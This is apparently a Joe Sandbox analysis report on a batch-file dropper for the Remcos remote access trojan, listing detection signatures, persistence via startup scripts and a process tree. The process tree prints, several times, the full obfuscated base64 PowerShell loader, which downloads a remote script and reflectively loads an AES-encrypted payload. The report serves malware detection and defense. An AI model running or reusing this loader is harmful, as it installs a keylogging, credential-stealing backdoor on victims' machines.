Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
puDUCOeVK6.bat

Overview

General Information

Sample name:puDUCOeVK6.bat
renamed because original name is a hash value
Original sample name:71e8e38688e85e2fb038f73762fe7655d5a9a02a838e738242fd00295c2a74da.bat
Analysis ID:1612238
MD5:2211ba20cf78fe7f57eb7d5aedfb58b3
SHA1:c0e3d5d3e7a6c7fb1b224c20e96a0a54e1df8737
SHA256:71e8e38688e85e2fb038f73762fe7655d5a9a02a838e738242fd00295c2a74da
Tags:abokirem-duckdns-orgbatuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\puDUCOeVK6.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\puDUCOeVK6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7952 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6568 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 5364 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\sfcepcvxio" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\vhpwquorvxkde" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2232 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3472 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3888 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2176 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2800 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5T